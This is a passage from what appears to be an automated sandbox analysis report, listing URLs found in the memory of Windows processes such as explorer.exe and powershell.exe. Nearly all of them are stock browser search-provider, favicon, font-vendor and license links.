Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001A.00000002.449147411.0000028E4D1E1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461748484.000000000F8A0000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: RuntimeBroker.exe, 00000027.00000002.578989598.000001E767B42000.00000004.00000001.sdmp String found in binary or memory: http://twitter.com/spotify:
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000025.00000000.461748484.000000000F8A0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001A.00000002.447464468.0000028E4D040000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.449500265.0000028E4D3EF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RuntimeBroker.exe, 00000027.00000002.578594602.000001E767A41000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: RuntimeBroker.exe, 00000027.00000002.578594602.000001E767A41000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsnVersio
Source: RuntimeBroker.exe, 00000027.00000002.578594602.000001E767A41000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
